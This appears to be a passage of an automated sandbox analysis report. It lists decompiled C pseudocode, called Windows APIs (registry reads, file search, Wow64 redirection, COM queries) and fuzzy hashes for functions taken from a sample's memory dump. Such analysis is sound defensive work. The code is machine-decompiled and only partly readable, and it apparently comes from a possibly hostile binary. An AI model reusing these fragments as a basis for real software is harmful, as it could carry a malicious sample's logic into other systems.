                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3D45
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3D65
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3D83
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3DA6
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3DC7
                                                                                  • HeapFree.KERNEL32(00000000,033F38A2,?,?,033F38A2,?), ref: 033F81B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                                                  • String ID:
                                                                                  • API String ID: 2794511967-0
                                                                                  • Opcode ID: 4b26aa43f75519c477c63bba4352af9ad1ab2346428325931d6242db3e0847d3
                                                                                  • Instruction ID: b98d438d9f0894491166ee9b56fb41d71980288ac74a45b784103b199e39cbc4
                                                                                  • Opcode Fuzzy Hash: 4b26aa43f75519c477c63bba4352af9ad1ab2346428325931d6242db3e0847d3
                                                                                  • Instruction Fuzzy Hash: 9D314D75500209EFCB01EF68D8C8EDA7BBCFB09354F908126FA019B254D730D915CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F5311, Relevance: 4.6, APIs: 3, Instructions: 57memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 28%
                                                                                  			E033F5311(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0x33fd2e0;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E033F3512(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E033F745D(_t19);
					if(_t20 == 0) {
						HeapFree( *0x33fd1f0, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0x33fd2e8; // 0x5f29bf0
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

















                                                                                  0x033f5318
                                                                                  0x033f531f
                                                                                  0x033f5322
                                                                                  0x033f5329
                                                                                  0x033f532e
                                                                                  0x033f5330
                                                                                  0x033f5337
                                                                                  0x033f533e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f5340
                                                                                  0x033f5345
                                                                                  0x033f5346
                                                                                  0x033f534d
                                                                                  0x033f5367
                                                                                  0x00000000
                                                                                  0x033f534f
                                                                                  0x033f534f
                                                                                  0x033f5351
                                                                                  0x033f5354
                                                                                  0x033f5358
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f535a
                                                                                  0x033f5358
                                                                                  0x033f5371
                                                                                  0x033f5373
                                                                                  0x033f5379
                                                                                  0x033f537b
                                                                                  0x033f5381
                                                                                  0x033f5388
                                                                                  0x033f5398
                                                                                  0x033f5390
                                                                                  0x033f5393
                                                                                  0x033f5393
                                                                                  0x033f539b
                                                                                  0x033f539b
                                                                                  0x033f53a5
                                                                                  0x033f53a5
                                                                                  0x033f536d
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 033F532E
                                                                                    • Part of subcall function 033F3512: RtlAllocateHeap.NTDLL(00000000,63699BC3,033FD2E0), ref: 033F353D
                                                                                    • Part of subcall function 033F3512: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 033F355F
                                                                                    • Part of subcall function 033F3512: memset.NTDLL ref: 033F3579
                                                                                    • Part of subcall function 033F3512: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 033F35B7
                                                                                    • Part of subcall function 033F3512: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 033F35CB
                                                                                    • Part of subcall function 033F3512: FindCloseChangeNotification.KERNELBASE(?), ref: 033F35E2
                                                                                    • Part of subcall function 033F3512: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 033F35EE
                                                                                    • Part of subcall function 033F3512: lstrcat.KERNEL32(?,642E2A5C), ref: 033F362F
                                                                                    • Part of subcall function 033F3512: FindFirstFileA.KERNELBASE(?,?), ref: 033F3645
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 033F5373
                                                                                    • Part of subcall function 033F745D: lstrlen.KERNEL32(?,033FD2E0,73BB7FC0,00000000,033F534B,?,?,?,?,?,033F70B5,?), ref: 033F7466
                                                                                    • Part of subcall function 033F745D: mbstowcs.NTDLL ref: 033F748D
                                                                                    • Part of subcall function 033F745D: memset.NTDLL ref: 033F749F
                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,033F70B5,?), ref: 033F5367
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
                                                                                  • String ID:
                                                                                  • API String ID: 1489712272-0
                                                                                  • Opcode ID: 4cb78bf9f5da874817c95ea7a568efe6488704727175bc16f2c1f6b52640c820
                                                                                  • Instruction ID: d373ff2541991fdb5ad9bef33b020bd2ce71162a01fe53834fc02d7fb09cd36c
                                                                                  • Opcode Fuzzy Hash: 4cb78bf9f5da874817c95ea7a568efe6488704727175bc16f2c1f6b52640c820
                                                                                  • Instruction Fuzzy Hash: A111087A910209AFFB00DB99DCC4BACB7A9EB46354FD40027E601D6090C3B5D9419B54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F76D6, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F76D6(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x33fd230; // 0x2b2a5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x33fea60; // 0x4f0053
				_v16 = 4;
				_t31 = E033F7404(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x33fd230; // 0x2b2a5a8
					_t5 = _t19 + 0x33feabc; // 0x6e0049
					_t34 = E033F7404(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E033F4C31(_t34);
					}
					E033F4C31(_t31);
				}
				return _v8;
			}













                                                                                  0x033f76dc
                                                                                  0x033f76e1
                                                                                  0x033f76e6
                                                                                  0x033f76ed
                                                                                  0x033f76f9
                                                                                  0x033f76fd
                                                                                  0x033f76ff
                                                                                  0x033f7705
                                                                                  0x033f7711
                                                                                  0x033f7715
                                                                                  0x033f7728
                                                                                  0x033f7730
                                                                                  0x033f7744
                                                                                  0x033f774c
                                                                                  0x033f774e
                                                                                  0x033f774e
                                                                                  0x033f7755
                                                                                  0x033f7755
                                                                                  0x033f775c
                                                                                  0x033f775c
                                                                                  0x033f7762
                                                                                  0x033f7767
                                                                                  0x033f776d

                                                                                  APIs
                                                                                    • Part of subcall function 033F7404: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,033F76F9,004F0053,00000000,?), ref: 033F740D
                                                                                    • Part of subcall function 033F7404: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,033F76F9,004F0053,00000000,?), ref: 033F7437
                                                                                    • Part of subcall function 033F7404: memset.NTDLL ref: 033F744B
                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 033F7728
                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 033F7744
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 033F7755
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 830012212-0
                                                                                  • Opcode ID: 70d8123046ba7244a9478f975896f196bfd63027968c0272c8b51e49ba706cd4
                                                                                  • Instruction ID: 25854c016c20b28adebd3ff2b30d65832e98214920b872338f1d06e2169e0c16
                                                                                  • Opcode Fuzzy Hash: 70d8123046ba7244a9478f975896f196bfd63027968c0272c8b51e49ba706cd4
                                                                                  • Instruction Fuzzy Hash: 48115B76900209BFDB11EB98DDC8FBEB7BCEB04740F940169F601E6159EB74D6059B20
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F7C82, Relevance: 4.6, APIs: 3, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 033F7CAA
                                                                                  • memcpy.NTDLL(?,?,?), ref: 033F7CC4
                                                                                    • Part of subcall function 033F75D9: SysFreeString.OLEAUT32(?), ref: 033F76B8
                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 033F7CF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$CreateDestroyFreeStringmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 4076844959-0
                                                                                  • Opcode ID: 228bbdc48b15f45969aad1c982e50ce3c19142b317cf87980ff5768cfd9f3be0
                                                                                  • Instruction ID: 5ca8204690a4e3721c1f56452f82fc98581e36fb33a4987b9fa6abab308fa80d
                                                                                  • Opcode Fuzzy Hash: 228bbdc48b15f45969aad1c982e50ce3c19142b317cf87980ff5768cfd9f3be0
                                                                                  • Instruction Fuzzy Hash: F3113C7290010ABFDF11EF95DC88EEEBBB9EF04350F408125FA05E6160E3759A15DBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F7B54, Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F7B54(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* __ebx;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				void* _t51;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_t51 = __edx;
				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E033F75C4(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x33fd280, 0x90);
					_t27 =  *0x33fd284; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						E033F735E(_t46, _a4, 0x90, _t27, 0);
					}
					if(E033F7A2A( &_v36) != 0 && E033FA83A(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E033F81E9(_a8,  &_v36, _t51, _t46, _a12, _t55); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						_t20 =  &(_t46[4]); // 0x8b4875fc
						memset(_t55, 0, _v12 - ( *_t20 & 0xf));
						_t57 = _t57 + 0xc;
						E033F4C31(_t55);
					}
					memset(_a4, 0, _t53);
					E033F4C31(_a4);
				}
				return _v16;
			}

















                                                                                  0x033f7b54
                                                                                  0x033f7b5a
                                                                                  0x033f7b5f
                                                                                  0x033f7b6c
                                                                                  0x033f7b6f
                                                                                  0x033f7b72
                                                                                  0x033f7b79
                                                                                  0x033f7b7c
                                                                                  0x033f7b8a
                                                                                  0x033f7b8f
                                                                                  0x033f7b94
                                                                                  0x033f7b99
                                                                                  0x033f7ba4
                                                                                  0x033f7ba4
                                                                                  0x033f7bb3
                                                                                  0x033f7bd1
                                                                                  0x033f7bda
                                                                                  0x033f7be1
                                                                                  0x033f7be9
                                                                                  0x033f7bef
                                                                                  0x033f7bf2
                                                                                  0x033f7bff
                                                                                  0x033f7c04
                                                                                  0x033f7c08
                                                                                  0x033f7c08
                                                                                  0x033f7c13
                                                                                  0x033f7c1e
                                                                                  0x033f7c1e
                                                                                  0x033f7c2a

                                                                                  APIs
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • memcpy.NTDLL(00000000,00000090,033F38A2,033F38A2,?,?,033F38A2,?,?,033F819E,?), ref: 033F7B8A
                                                                                  • memset.NTDLL ref: 033F7BFF
                                                                                  • memset.NTDLL ref: 033F7C13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: memset$AllocateHeapmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1529149438-0
                                                                                  • Opcode ID: 3612ed8f2308903e7c6b6cc9a861ddba92d59000ad8b794d701c332cf73cc99a
                                                                                  • Instruction ID: d7bcb62011a3cc0993d1085e7ffc6dd86e0666f0a00cfe34a1a7fb92b054e71c
                                                                                  • Opcode Fuzzy Hash: 3612ed8f2308903e7c6b6cc9a861ddba92d59000ad8b794d701c332cf73cc99a
                                                                                  • Instruction Fuzzy Hash: 13211D76900218BFDF11EBA5CD80FEEBBBCAF09350F444065FA04EA251E634D601CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F4AC1, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 38%
                                                                                  			E033F4AC1(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x33fd230; // 0x2b2a5a8
				_t4 = _t49 + 0x33fe448; // 0x5f289f0
				_t5 = _t49 + 0x33fe438; // 0x9ba05972
				_t51 =  *0x33fd12c(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x33fd230; // 0x2b2a5a8
						_t30 = _t56 + 0x33fe428; // 0x5f289d0
						_t31 = _t56 + 0x33fe458; // 0x4c96be40
						_t58 =  *0x33fd0f8(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x33fd230; // 0x2b2a5a8
											_t23 = _t76 + 0x33fe428; // 0x5f289d0
											_t24 = _t76 + 0x33fe458; // 0x4c96be40
											_t105 =  *0x33fd0f8(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x33fd230; // 0x2b2a5a8
													_t67 = _v28;
													_t40 = _t99 + 0x33fe418; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                                                                                  0x033f4acc
                                                                                  0x033f4ace
                                                                                  0x033f4ad5
                                                                                  0x033f4ad6
                                                                                  0x033f4ad7
                                                                                  0x033f4ad8
                                                                                  0x033f4ade
                                                                                  0x033f4ae3
                                                                                  0x033f4aed
                                                                                  0x033f4af4
                                                                                  0x033f4afa
                                                                                  0x033f4afe
                                                                                  0x033f4b04
                                                                                  0x033f4b0c
                                                                                  0x033f4b0d
                                                                                  0x033f4b12
                                                                                  0x033f4b13
                                                                                  0x033f4b15
                                                                                  0x033f4b18
                                                                                  0x033f4b19
                                                                                  0x033f4b1a
                                                                                  0x033f4b20
                                                                                  0x033f4bb5
                                                                                  0x033f4bba
                                                                                  0x033f4bc1
                                                                                  0x033f4bcb
                                                                                  0x033f4bd1
                                                                                  0x033f4bd3
                                                                                  0x033f4bd9
                                                                                  0x00000000
                                                                                  0x033f4b26
                                                                                  0x033f4b26
                                                                                  0x033f4b2d
                                                                                  0x033f4b36
                                                                                  0x033f4b3a
                                                                                  0x033f4b40
                                                                                  0x033f4b43
                                                                                  0x033f4baa
                                                                                  0x00000000
                                                                                  0x033f4b45
                                                                                  0x033f4b45
                                                                                  0x033f4bdc
                                                                                  0x033f4bde
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f4b4b
                                                                                  0x033f4b4b
                                                                                  0x033f4b4b
                                                                                  0x033f4b52
                                                                                  0x033f4b58
                                                                                  0x033f4b5d
                                                                                  0x033f4b65
                                                                                  0x033f4b66
                                                                                  0x033f4b67
                                                                                  0x033f4b69
                                                                                  0x033f4b6d
                                                                                  0x033f4b71
                                                                                  0x00000000
                                                                                  0x033f4b73
                                                                                  0x033f4b77
                                                                                  0x033f4b7c
                                                                                  0x033f4b83
                                                                                  0x033f4b93
                                                                                  0x033f4b95
                                                                                  0x033f4b9b
                                                                                  0x033f4ba0
                                                                                  0x033f4be0
                                                                                  0x033f4be0
                                                                                  0x033f4bed
                                                                                  0x033f4bf1
                                                                                  0x033f4bf6
                                                                                  0x033f4bfc
                                                                                  0x033f4c01
                                                                                  0x033f4c0b
                                                                                  0x033f4c0d
                                                                                  0x033f4c13
                                                                                  0x033f4c13
                                                                                  0x033f4c16
                                                                                  0x033f4c1c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f4ba0
                                                                                  0x00000000
                                                                                  0x033f4ba2
                                                                                  0x033f4ba2
                                                                                  0x033f4ba3
                                                                                  0x00000000
                                                                                  0x033f4ba8
                                                                                  0x033f4b45
                                                                                  0x033f4b43
                                                                                  0x033f4b3a
                                                                                  0x033f4c1f
                                                                                  0x033f4c1f
                                                                                  0x033f4c25
                                                                                  0x033f4c25
                                                                                  0x033f4c2e

                                                                                  APIs
                                                                                  • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,05F289D0,033F841C,?,?,?,?,?,?,?,?,?,?,?,033F841C), ref: 033F4B8D
                                                                                  • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,05F289D0,033F841C,?,?,?,?,?,?,?,033F841C,00000000,00000000,00000000,006D0063), ref: 033F4BCB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: QueryServiceUnknown_
                                                                                  • String ID:
                                                                                  • API String ID: 2042360610-0
                                                                                  • Opcode ID: 6d1a38eccf4c856d28e8bb8db932249dccfe3ce4efd291f2d3b983959599b92e
                                                                                  • Instruction ID: ffb98bbe54b6c76946820fa0c9f4463bd79447531d57a9f7a99ad017ff5d0790
                                                                                  • Opcode Fuzzy Hash: 6d1a38eccf4c856d28e8bb8db932249dccfe3ce4efd291f2d3b983959599b92e
                                                                                  • Instruction Fuzzy Hash: 76513D75D00219AFCB00DFE9C8C8DAEB7B9FF48310B444598EA05EB255D731AD42CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F75D9, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 75%
                                                                                  			E033F75D9(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E033F8861(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x33fd230; // 0x2b2a5a8
						_t20 = _t68 + 0x33fe1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E033F1143(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                  0x033f75df
                                                                                  0x033f75e2
                                                                                  0x033f75f2
                                                                                  0x033f75fb
                                                                                  0x033f75ff
                                                                                  0x033f76cd
                                                                                  0x033f76d3
                                                                                  0x033f76d3
                                                                                  0x033f7619
                                                                                  0x033f761e
                                                                                  0x033f7622
                                                                                  0x033f7628
                                                                                  0x033f762d
                                                                                  0x033f7634
                                                                                  0x033f7643
                                                                                  0x033f7643
                                                                                  0x033f7647
                                                                                  0x033f7649
                                                                                  0x033f7655
                                                                                  0x033f7660
                                                                                  0x033f766b
                                                                                  0x033f766f
                                                                                  0x033f7679
                                                                                  0x033f767d
                                                                                  0x033f767f
                                                                                  0x033f7684
                                                                                  0x033f768b
                                                                                  0x033f769b
                                                                                  0x033f769b
                                                                                  0x033f7684
                                                                                  0x033f767d
                                                                                  0x033f769d
                                                                                  0x033f76a2
                                                                                  0x033f76a7
                                                                                  0x033f76a7
                                                                                  0x033f76ad
                                                                                  0x033f76b3
                                                                                  0x033f76b8
                                                                                  0x033f76b8
                                                                                  0x033f76bd
                                                                                  0x033f76c2
                                                                                  0x033f76c2
                                                                                  0x033f76bd
                                                                                  0x033f7647
                                                                                  0x033f76c4
                                                                                  0x033f76ca
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 033F8861: SysAllocString.OLEAUT32(80000002), ref: 033F88B8
                                                                                    • Part of subcall function 033F8861: SysFreeString.OLEAUT32(00000000), ref: 033F891D
                                                                                  • SysFreeString.OLEAUT32(?), ref: 033F76B8
                                                                                  • SysFreeString.OLEAUT32(033FA412), ref: 033F76C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: String$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 986138563-0
                                                                                  • Opcode ID: 66b3baa5cce421c18e7aa94e224ef4d97267c9288cf334b25db927571be77ba7
                                                                                  • Instruction ID: 70064f99f0d35e108695a4d3cfcd39881e79a1865a7e1765344dfe8a937af8f5
                                                                                  • Opcode Fuzzy Hash: 66b3baa5cce421c18e7aa94e224ef4d97267c9288cf334b25db927571be77ba7
                                                                                  • Instruction Fuzzy Hash: 45314876900119AFCB11DF68CC88C9BBB79FFC97807544668F9159B210D331DD51CBA0
